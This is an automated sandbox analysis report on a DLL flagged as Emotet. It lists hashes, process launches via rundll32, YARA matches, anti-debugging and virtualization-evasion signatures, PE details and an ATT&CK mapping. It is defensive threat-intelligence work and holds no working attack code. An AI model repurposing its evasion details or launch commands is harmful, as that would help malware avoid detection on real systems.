Play interactive tour

Edit tour

Windows Analysis Report K5hW6I5xeA

Overview

General Information

Sample Name:	K5hW6I5xeA (renamed file extension from none to dll)
Analysis ID:	531949
MD5:	d89375ecbc2638d71f6cc446947adb71
SHA1:	d9cd4340910bd1dd2f3d576fd7ea5fdfd6671060
SHA256:	e523b545ce399ceb37ba1fb400ba5e7a285e6d4c1e3ae5bbd5607ce538b64ac7
Tags:	32dllexetrojan
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Emotet

Multi AV Scanner detection for submitted file

Tries to detect virtualization through RDTSC time measurements

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Creates a process in suspended mode (likely to inject code)

Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6692 cmdline: loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 4592 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5880 cmdline: rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4344 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6376 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6752 cmdline: rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Unpacked PEs

Source	Rule	Description	Author
9.2.rundll32.exe.4d30000.0.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.4d30000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.4d30000.0.raw.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
9.2.rundll32.exe.4d30000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: K5hW6I5xeA.dll

Virustotal: Detection: 28%

Perma Link

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA52300 CryptDecrypt,CryptSetKeyParam,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,VirtualAlloc,		2_2_6EA52300
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA54940 CryptAcquireContextA,		2_2_6EA54940

Source: K5hW6I5xeA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: K5hW6I5xeA.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA57045 FindFirstFileExA,

2_2_6EA57045

Source: loaddll32.exe, 00000002.00000002.836708742.0000000000F7B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 9.2.rundll32.exe.4d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.4d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA52300 CryptDecrypt,CryptSetKeyParam,CryptReleaseContext,CryptDestroyKey,CryptImportKey,CryptAcquireContextA,CryptAcquireContextA,CryptImportKey,VirtualAlloc,

2_2_6EA52300

Source: K5hW6I5xeA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA52A10	2_2_6EA52A10
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA5C678	2_2_6EA5C678
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA51000	2_2_6EA51000

Source: K5hW6I5xeA.dll

Virustotal: Detection: 28%

Source: K5hW6I5xeA.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,ewjabexomfikq	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,fkehpgdsrju	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1	Jump to behavior

Source: classification engine

Classification label: mal68.troj.evad.winDLL@11/0@0/0

Source: K5hW6I5xeA.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: K5hW6I5xeA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: K5hW6I5xeA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: K5hW6I5xeA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: K5hW6I5xeA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: K5hW6I5xeA.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA53C66 push ecx; ret

2_2_6EA53C79

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA525AA second address: 000000006EA525B9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+60h], 00000000h 0x0000000b mov dword ptr [esp+60h], ecx 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA525B9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+5Ch], 00000000h 0x0000000b mov dword ptr [esp+5Ch], ecx 0x0000000f nop dword ptr [eax+eax+00000000h] 0x00000017 inc esi 0x00000018 mov dword ptr [esp+64h], 00000000h 0x00000020 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D65053704h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D6476A404h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA525AA second address: 000000006EA525B9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+60h], 00000000h 0x0000000b mov dword ptr [esp+60h], ecx 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA525B9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+5Ch], 00000000h 0x0000000b mov dword ptr [esp+5Ch], ecx 0x0000000f nop dword ptr [eax+eax+00000000h] 0x00000017 inc esi 0x00000018 mov dword ptr [esp+64h], 00000000h 0x00000020 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006EA525D9 second address: 000000006EA525D9 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+64h], ecx 0x00000007 movd xmm0, esi 0x0000000b cvtdq2pd xmm0, xmm0 0x0000000f comisd xmm2, xmm0 0x00000013 jnc 00007F4D65053704h 0x00000015 inc esi 0x00000016 mov dword ptr [esp+64h], 00000000h 0x0000001e rdtscp

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA52570 rdtscp

2_2_6EA52570

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA57045 FindFirstFileExA,

2_2_6EA57045

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA53A9C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_6EA53A9C

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA56AEE mov eax, dword ptr fs:[00000030h]	2_2_6EA56AEE
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA528D0 mov eax, dword ptr fs:[00000030h]	2_2_6EA528D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA52DF0 mov eax, dword ptr fs:[00000030h]	2_2_6EA52DF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA52DF0 mov eax, dword ptr fs:[00000030h]	2_2_6EA52DF0
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA55900 mov eax, dword ptr fs:[00000030h]	2_2_6EA55900

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA5817A GetProcessHeap,

2_2_6EA5817A

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA52570 rdtscp

2_2_6EA52570

Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA53A9C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EA53A9C
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA56B21 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6EA56B21
Source: C:\Windows\System32\loaddll32.exe	Code function: 2_2_6EA535A6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6EA535A6

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1

Jump to behavior

Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: rundll32.exe, 00000005.00000002.900961569.0000000002CD0000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.815423711.0000000002CF0000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.898119052.0000000002BF0000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.902935015.00000000038A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA53C7C cpuid

2_2_6EA53C7C

Source: C:\Windows\System32\loaddll32.exe

Code function: 2_2_6EA536C7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_6EA536C7

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 9.2.rundll32.exe.4d30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.4d30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.914221138.0000000004D30000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Rundll321	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery13	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	File and Directory Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
K5hW6I5xeA.dll	28%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.rundll32.exe.4d30000.0.unpack	100%	Avira	HEUR/AGEN.1110387		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	531949
Start date:	01.12.2021
Start time:	15:23:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	K5hW6I5xeA (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.troj.evad.winDLL@11/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 89.5%) Quality average: 75.8% Quality standard deviation: 32.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.673697209310638
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	K5hW6I5xeA.dll
File size:	273920
MD5:	d89375ecbc2638d71f6cc446947adb71
SHA1:	d9cd4340910bd1dd2f3d576fd7ea5fdfd6671060
SHA256:	e523b545ce399ceb37ba1fb400ba5e7a285e6d4c1e3ae5bbd5607ce538b64ac7
SHA512:	46a132edd6e8765b11d14a2dd995617fcffe04c081a028b7339f06db7653ec2ea91870fc123bc21cab39c84bbecf70c6a08a6e1e72705835697790a813773ba0
SSDEEP:	6144:I+/WjBDXCrZukVAAYCcVwnmU3PbnvOWRPyrLzP:lWGACc2PlRKrLzP
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.`d9..79..79..7J..63..7J..6...7J..6+..7k..6%..7k..66..7k..6+..7J..6:..79..7k..7...60..7...68..7...78..7...68..7Rich9..7.......

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10003583
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61A7688F [Wed Dec 1 12:20:31 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3bc41ab907dcf32970630360a7a2019f

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F4D64AB75D7h
call 00007F4D64AB7758h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F4D64AB7488h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1000E00Ch]
push dword ptr [ebp+08h]
call dword ptr [1000E008h]
push C0000409h
call dword ptr [1000E010h]
push eax
call dword ptr [1000E014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F4D64AC0C36h
test eax, eax
je 00007F4D64AB75D7h
push 00000002h
pop ecx
int 29h
mov dword ptr [10043868h], eax
mov dword ptr [10043864h], ecx
mov dword ptr [10043860h], edx
mov dword ptr [1004385Ch], ebx
mov dword ptr [10043858h], esi
mov dword ptr [10043854h], edi
mov word ptr [10043880h], ss
mov word ptr [10043874h], cs
mov word ptr [10043850h], ds
mov word ptr [1004384Ch], es
mov word ptr [10043848h], fs
mov word ptr [10043844h], gs
pushfd
pop dword ptr [10043878h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [1004386Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [10043870h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x42400	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4257c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0xea4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x41f80	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x104	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc387	0xc400	False	0.582011320153	data	6.66250995052	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x34b56	0x34c00	False	0.730320645735	data	6.21371435728	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x43000	0x30d0	0x800	False	0.16357421875	data	2.04808247088	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0xf8	0x200	False	0.3359375	data	2.52739185048	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0xea4	0x1000	False	0.763671875	data	6.28630296444	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x47060	0x91	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

GetProcessHeap, WriteConsoleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InterlockedFlushSList, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, RaiseException, ExitProcess, GetModuleHandleExW, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle, DecodePointer

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10002540
ewjabexomfikq	2	0x10002810
fkehpgdsrju	3	0x10002890
hccjznkicyecp	4	0x10002860
hdekbiavwfv	5	0x100028a0
jhvbaqehqk	6	0x10002880
neqhjiziu	7	0x10002850
nlrehsflisyuqnf	8	0x10002830
qgtkxvadqyopue	9	0x10002820
rawlhsccualjvyace	10	0x100028b0
tjyttnnknxvspvdyq	11	0x100028c0
useprszs	12	0x10002840
wjainmjvfb	13	0x10002800
wrenlws	14	0x10002870

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6692 Parent PID: 5724

General

Start time:	15:24:09
Start date:	01/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll"
Imagebase:	0x240000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4592 Parent PID: 6692

General

Start time:	15:24:09
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4344 Parent PID: 6692

General

Start time:	15:24:10
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\K5hW6I5xeA.dll,Control_RunDLL
Imagebase:	0x80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5880 Parent PID: 4592

General

Start time:	15:24:10
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\K5hW6I5xeA.dll",#1
Imagebase:	0x80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

